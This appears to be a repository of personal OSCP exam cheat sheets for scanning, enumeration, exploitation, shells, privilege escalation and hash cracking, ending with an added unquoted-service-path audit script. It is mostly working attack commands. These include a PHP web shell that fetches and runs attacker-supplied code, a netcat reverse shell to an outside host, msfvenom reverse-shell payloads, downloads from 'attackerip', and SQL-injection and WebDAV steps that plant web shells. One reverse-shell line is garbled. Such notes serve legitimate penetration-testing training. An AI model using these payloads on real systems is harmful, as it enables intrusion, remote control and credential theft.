├── README.md
├── 8 - Crack
├── 2 - Port Scan
├── 1 - Roadmap
├── 4 - File Transfer
├── 6 - Exploitation
├── 0 - Buffer Overflow
├── 5 - Shells
├── 7 - Privilege Escalation
└── 3 - Enumeration

/README.md:
--------------------------------------------------------------------------------
# OSCP

![OSCP](https://cdn-images-1.medium.com/max/1600/1*dunp7oguHArqzlU49-GX2Q.png)

This repo contains the resources I used during the OSCP exam. I prepared it in an explanatory way, I hope you find it useful. Good luck guys!😈

--------------------------------------------------------------------------------
/8 - Crack:
--------------------------------------------------------------------------------
#Possible Hash - identify the hash type in Kali
hash-identifier
2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

#with John
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

#with Hashcat (-m selects the hash mode; 13100 is Kerberos 5 TGS-REP, pick the mode that matches your hash)
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

#Online
https://crackstation.net/

--------------------------------------------------------------------------------
/2 - Port Scan:
--------------------------------------------------------------------------------
#Full Port Scan
nmap -p- --open -vvv -oN fullportscan <ip>

#Script & Version Scan
nmap -p 80,445 -sV -sC -vvv -O -oN versionscan <ip>

#No Ping Scan
nmap -Pn -vvv -oN nopingscan <ip>

#Vuln Scan
nmap -p 445 -T4 -Pn -A --script smb-vuln* -vvv -oN vulnscan <ip>

#No DNS Resolution
nmap -n -vvv -oN nodnsresolutionscan <ip>

#UDP Scan
nmap -sU --open -vvv -oN udpscan <ip>

#Script
https://github.com/21y4d/nmapAutomator

--------------------------------------------------------------------------------
/1 - Roadmap:
--------------------------------------------------------------------------------
Steps to be followed for the machine solution;

1. Port scan
2. Enumeration
3. Vulnerability research
4. Exploitation of the vulnerability (user shell)
5. Privilege escalation (root/administrator shell)

-------------------------------------------------------------------------------------------------------------------------------

File search;

#for Windows
dir C:\ /s/b | find /i "root.txt"

#for Linux
updatedb
locate root.txt

-------------------------------------------------------------------------------------------------------------------------------

File read;

#for Windows
type C:\Users\Administrator\Desktop\root.txt

#for Linux
cat /root/root.txt

-------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/4 - File Transfer:
--------------------------------------------------------------------------------
LINUX

#Firstly, we create a web server on our own machine (Python 2; with Python 3 use "python3 -m http.server");
python -m SimpleHTTPServer

#Then we get our file over the webserver;
wget http://attackerip/file
curl http://attackerip/file > file

------------------------------------------------------------------------------------------------------------------------------

WINDOWS

#Firstly, we create a web server on our own machine;
python -m SimpleHTTPServer

OPTION 1:

#Then we get our file over the webserver;
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://attackerip/WindowsEnum/WindowsEnum.ps1','C:\Users\Public\Downloads\WindowsEnum.ps1')

OPTION 2:

#We run the following commands on the victim system, in order (each line appends to wget.ps1);
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://attackerip:port/Chimichurri.exe" >>wget.ps1
echo $file = "ms10-059-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

OPTION 3:

#Then we get our file over the webserver;
certutil.exe -urlcache -split -f "http://attackerip/file.exe"

--------------------------------------------------------------------------------
/6 - Exploitation:
--------------------------------------------------------------------------------
#Search for exploits with Google;
site:exploit-db.com "October CMS"
site:github.com "October CMS"

#Search for exploits with searchsploit;
searchsploit OpenSSL
searchsploit OpenSSL | grep --invert-match 'PHP\|Heartbleed\|dos\|windows'

searchsploit -p 41936   #show the full path of the exploit by its EDB-ID
cp /usr/share/exploitdb/exploits/php/webapps/41936.txt .

-------------------------------------------------------------------------------------------------------------------------------
#Compile the exploit

##for Linux;

which gcc
gcc -o kernel-exploit 44298.c
./kernel-exploit

or

dos2unix exploit.sh   (very useful ;) converts Windows line endings to Unix ones)
For more: https://tools.kali.org/reporting-tools/dos2unix

##for Windows;
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32

-------------------------------------------------------------------------------------------------------------------------------

#Running the exploit

##Firstly, make it executable;
chmod +x asd.sh
or
chmod 755 asd.sh

##Later;
./asd.sh
python asd.py
perl asd.pl
ruby asd.rb
php asd.php   (if php-curl is required: apt install php-curl)

------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/0 - Buffer Overflow:
--------------------------------------------------------------------------------
Steps to be followed for the machine solution;

Note: If the application becomes unresponsive after a debugging step, close Immunity Debugger first, then restart the "vulnapp.exe" application, and attach to it and run it again in Immunity Debugger.

1. Segmentation fault;
Send a string long enough to crash the victim application

2. Find the offset;
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>

3. Control the EIP;
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP value>

4. Find the bad chars;

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

5. Find a JMP ESP instruction;
!mona modules   #List the loaded modules
!mona modules -o   #List only the non-OS modules (-o ignores OS modules). Choose a module that has no memory protections and whose address contains no bad characters.
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb   #Get the opcodes for JMP ESP
!mona find -s "<jmp esp opcodes>" -m vulnapp_dll.dll   #Find the address of the JMP ESP opcodes in the chosen module

6. Create shellcode;
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f py -b '<badchars>' -e x86/shikata_ga_nai

--------------------------------------------------------------------------------
/5 - Shells:
--------------------------------------------------------------------------------
#with PHP
----------------------------------------------------------------------------------------------------------

&1|nc 3333 >/tmp/f');?>

##Secure, simple PHP shell to load and execute code;

<?php
if (isset($_REQUEST['fupload'])) {
    // fetch a file from the attacker's web server and write it to the given path
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://<ip>:8000/" . $_REQUEST['fupload']));
}

if (isset($_REQUEST['fexec'])) {
    // run the given command and return its output
    echo shell_exec($_REQUEST['fexec']);
}
?>

##Start the listener on the attacker machine;
nc -lvp 1234

##Call the script and get the shell;
http://10.10.10.9/catch.php?fexec=nc.exe <ip> 1234 -e cmd.exe

------------------------------------------------------------------------------------------------------------------------------

#with Msfvenom

##Listing payloads (specific);
msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}'

.exe;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1337 -f exe > asd.exe

.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f aspx > asd.aspx

.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=3333 -f raw > asd.jsp

.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=3333 -f war > shell.war

----------------------------------------------------------------------------------------------------------

#with Kali

/usr/share/laudanum/

----------------------------------------------------------------------------------------------------------

#with online reverse shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

----------------------------------------------------------------------------------------------------------

#Upgrading simple shells to fully interactive TTYs

##With bash;
/bin/bash -i

##With sh;
/bin/sh -i

##With echo;
echo os.system('/bin/bash')

##With python;
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'

##With mawk;
mawk 'BEGIN {system("/bin/sh")}'

##With perl;
perl -e 'exec "/bin/sh";'

##Enabling tab completion (e.g. for long file paths);
CTRL+Z
stty raw -echo
fg + [Enter x 2]
----------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/7 - Privilege Escalation:
--------------------------------------------------------------------------------
LINUX

#Firstly, you can run the script below. It is important that you read its output carefully.
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

#Kernel and OS
uname -a
cat /etc/issue
cat /etc/redhat-release   //Redhat
cat /etc/lsb-release   //Debian/Ubuntu

#Sudo misconfiguration;
sudo -l
sudo -u scriptmanager bash   //Switch user with the "sudo" command

#Detection of programs with the SUID bit;
find / -perm -4000 -user root -type f -print 2>/dev/null

#Scheduled jobs;
crontab -l
cat /etc/crontab

#Detection of processes running as root;
ps aux | grep root

#Detection of installed applications;
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l

#For more manual enumeration steps;
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

-------------------------------------------------------------------------------------------------------------------------------

WINDOWS

#For the detection of missing patches;
https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py

#Operating System
systeminfo
wmic qfe

#Users
whoami
echo %USERNAME%
net users
net user
whoami /priv
net localgroup

#Network
ipconfig /all
route print
arp -a
netstat -ano

#Programs
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

#Unquoted Service Paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

#Scheduled tasks;
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

#For more manual enumeration steps;
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

#For application examples;
https://www.youtube.com/watch?v=Fms9UuW05DA&list=PLi0kul0fEhZ9LNZN0-A3nX2xcx2R70JwN

#Groups.xml

get Groups.xml
cat Groups.xml   (name, cpassword)
gpp-decrypt <cpassword>   #decrypt the password
smbclient -W <domain> -U <name> //<ip>/<share_name>

#SPN

git clone https://github.com/SecureAuthCorp/impacket.git
python GetUserSPNs.py <domain>/<user>:<decrypted_password> -dc-ip <ip> -request
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

-------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/3 - Enumeration:
--------------------------------------------------------------------------------
### HTTP ###

http://<ip>/robots.txt

DIRECTORY BRUTE FORCE

#with dirb;
dirb http://<ip>/
dirb http://<ip>/ -r -o dirb.txt

#with gobuster
gobuster -u http://<ip>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -o gobuster.txt
gobuster -u http://<ip>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -x html,php,asp,aspx -o gobuster.txt
gobuster -u http://<ip>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -k -x html,php,asp,aspx -o gobuster.txt

#with wfuzz
wfuzz --hc 404,400 -c -z file,/usr/share/dirb/wordlists/big.txt http://<ip>/FUZZ

#with dirsearch
python3 dirsearch.py -u http://<ip>/ -e php -x 403,404 -t 50   (Warning: this scan takes a long time to run)

******************************************************************************************************************************

VULNERABILITY SCAN

#with nikto;
nikto --host=http://<ip>

******************************************************************************************************************************

LFI

#for Linux;
http://<ip>/test.php?page=../../../../etc/passwd   #basic
http://<ip>/test.php?page=../../../etc/passwd   #null byte
http://<ip>/test.php?page=%252e%252e%252fetc%252fpasswd   #double encoding

#for Windows;
http://<ip>/test.php?page=../../../../../WINDOWS/win.ini
http://<ip>/test.php?page=../../../../../xampp/apache/bin/php.ini

******************************************************************************************************************************

SQL Injection (Manual Steps)

#Victim address;
http://<ip>/test.php?id=3'

#Find the number of columns;
http://<ip>/test.php?id=3 order by 5

#Find which columns are reflected in the output;
http://<ip>/test.php?id=3 union select 1,2,3,4,5

#Get the db user and db version from the database;
http://<ip>/test.php?id=3 union select 1,2,version(),4,5
http://<ip>/test.php?id=3 union select 1,2,user(),4,5

#Get all tables;
http://<ip>/test.php?id=3 union select 1,2,table_name,4,5 from information_schema.tables

#Get all columns from a specific table;
http://<ip>/test.php?id=3 union select 1,2,column_name,4,5 from information_schema.columns where table_name='wpusers'

#Viewing files;
http://<ip>/test.php?id=3' union select 1,2,load_file('/var/www/mysqli_connect.php'),4,5 -- -
http://<ip>/test.php?id=3' union select 1,2,load_file('/etc/passwd'),4,5 -- -

#Uploading files;
http://<ip>/test.php?id=3' union select null,null,load_file('/var/www/brc_shell.php'),4,5 -- -
http://<ip>/test.php?id=3' union select null,null,"",4,5 into outfile '/var/www/brc_shell.php' -- -

******************************************************************************************************************************

SCENARIOS

MySQL to SHELL

#Write the shell from the db onto the victim system;
select 1,2,3,'',6,7,8,9,10 INTO OUTFILE '/var/www/brc_shell.php';

#Call the shell and execute code;
http://<ip>/shell.php?cmd=ifconfig

LFI to RCE
#Inject shell to victim system;

#Call the shell and execute code;
http://<ip>/shell.php?cmd=ls -la

******************************************************************************************************************************

CMS Enumeration

#Wordpress
wpscan --url http://<ip>/ --enumerate p --enumerate u --enumerate t

#Joomla
joomscan -u http://<ip>/ --enumerate-components

#Drupal
./droopescan scan drupal -u http://<ip>/

******************************************************************************************************************************

CURL

#Uploading files to the victim system and changing the extension of the uploaded file;
echo worldofpentest > test.txt   #create file
curl -X PUT http://<ip>/brc.txt -d @test.txt   #put to target
curl http://<ip>/brc.txt   #call the file

#Uploading a shell to the victim system with curl;
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://<ip>/brc_shell.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://<ip>/shell.aspx' http://<ip>/brc_shell.txt

Note: When we upload the shell to the victim system as above, we may get a runtime error on the system.
The reason for this: the victim system noticed the shell we uploaded and erased the whitespace.
#To preserve the whitespace, we should use "--data-binary" (curl's -d strips the newlines out of an @file body);
curl -X PUT http://<ip>/brc_shell.txt --data-binary @shell.aspx
curl -X MOVE -H 'Destination:http://<ip>/shell.aspx' http://<ip>/brc_shell.txt

******************************************************************************************************************************

WebDAV Server Attacks

#What types of files can I upload to the victim system?
davtest --url http://<ip>

-------------------------------------------------------------------------------------------------------------------------------

### DNS ###

Firstly, add the domain information detected during port scans to the file "/etc/hosts";

#Then check the DNS servers;
dig ns <domain>

or

nslookup
> server <ip>

#For zone transfer;
dig @ns1.example.com example.com axfr

or

host -l <domain> <dns server ip>

Note: The "dnsrecon" tool can also be used for this.

-------------------------------------------------------------------------------------------------------------------------------

### SMB ###

#Checking SMB shares;
smbmap -H <ip>

#Connect to SMB shares;
smbclient \\\\<ip>\\share_name
smbclient \\\\<ip>\\share_name -U mike

#Check null sessions;
rpcclient -U "" -N <ip>
> srvinfo
> enumdomusers
> getdompwinfo
> querydominfo

Note: Null sessions are found on old Windows servers.

#Enumerate SMB shares;
enum4linux -a <ip>

#SMB version detection script;
smbver.sh -> https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html

-------------------------------------------------------------------------------------------------------------------------------

### NFS ###

#Checking public shares;
showmount -e <ip>

Example shares;
/var
/asd

#Mounting;
mkdir brc   #Create a mount point
mount <ip>:/var brc   #We mount the /var directory exported by the target onto the brc directory we created on our own machine.

-------------------------------------------------------------------------------------------------------------------------------

### MySQL ###

#Connecting to MySQL;
mysql --host=INSERTIPADDRESS -u root -p

#Listing databases;
show databases;

#Choosing a database;
use information_schema;

#Uploading the shell;
select 1,2,3,'',6,7,8,9,10 INTO OUTFILE '/var/www/brc_shell.php';

-------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
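The "#Unquoted Service Paths" check in the Windows privilege escalation notes above chains three findstr filters over wmic output (start mode Auto, not under C:\Windows, no double quote in the line). The added example below (not the repo's own code) applies the same filters in Python over the CSV form of that wmic output, but decides on the executable path itself rather than on whether the line contains a quote, so a quoted binary with unquoted arguments is not reported and an unquoted binary path with spaces is, which is the condition the service manager actually trips on. The sample output is constructed; the column names follow `wmic ... /format:csv` (Node first, then the requested columns) and the code looks columns up by header name, so the order is not relied on.

```python
"""Unquoted service path audit for the Windows privilege escalation notes.

Added example (not the repo's own code): parses the output of
`wmic service get name,displayname,pathname,startmode /format:csv` and
reports the services the findstr pipeline in the notes is looking for.
The sample output below is constructed; the column order assumes wmic's
CSV format, and columns are looked up by header name rather than position.
"""
import csv
import io
import re

# Constructed sample. wmic emits a blank line first and prefixes every row
# with the computer name in the Node column.
WMIC_CSV = "\n".join([
    "",
    "Node,DisplayName,Name,PathName,StartMode",
    "HOST01,Print Spooler,Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto",
    "HOST01,Vulnerable Service,VulnSvc,C:\\Program Files\\Vuln App\\bin\\service.exe -k netsvcs,Auto",
    'HOST01,Safe Service,SafeSvc,"""C:\\Program Files\\Safe App\\service.exe""",Auto',
    "HOST01,Manual Service,ManualSvc,C:\\Program Files\\Other App\\svc.exe,Manual",
    "HOST01,Agent,Agent,C:\\Tools\\agent.exe -config C:\\Program Files\\agent,Auto",
    "HOST01,Windows Thing,WinSvc,C:\\Windows\\Some Dir\\svc.exe,Auto",
])


def parse_wmic_csv(text):
    """Turn wmic /format:csv output into dicts keyed by column header."""
    lines = [line for line in text.splitlines() if line.strip()]
    return list(csv.DictReader(io.StringIO("\n".join(lines))))


def executable_part(pathname):
    """The binary path only: everything up to and including the first '.exe'.

    Spaces in the arguments after the executable are harmless; only spaces
    in the path to the binary let the service manager try the wrong file.
    """
    m = re.search(r"\.exe", pathname, re.IGNORECASE)
    return pathname[:m.end()] if m else pathname.split(" ")[0]


def is_unquoted_with_spaces(pathname):
    """True when the binary path contains a space and is not wrapped in quotes."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    return " " in executable_part(p)


def find_unquoted_service_paths(text, auto_only=True, skip_windows_dir=True):
    """Apply the notes' filters (Auto start, not under C:\\Windows) and return
    (service name, PathName) pairs whose binary path needs quoting."""
    findings = []
    for row in parse_wmic_csv(text):
        path = (row.get("PathName") or "").strip()
        if auto_only and (row.get("StartMode") or "").lower() != "auto":
            continue
        if skip_windows_dir and path.lower().lstrip('"').startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path):
            findings.append((row["Name"], path))
    return findings


if __name__ == "__main__":
    for name, path in find_unquoted_service_paths(WMIC_CSV):
        print(f"{name}: {path}")
```

On the sample only VulnSvc is reported: SafeSvc is quoted, Agent has spaces only in its arguments, ManualSvc is filtered by start mode and WinSvc by the C:\Windows exclusion (pass `auto_only=False` or `skip_windows_dir=False` to see those too). The fix for a reported service is to wrap the binary path in quotes in the service's ImagePath; on current Windows, where wmic is deprecated, `Get-CimInstance Win32_Service` exposes the same Name, PathName and StartMode properties and can be exported to CSV for this parser.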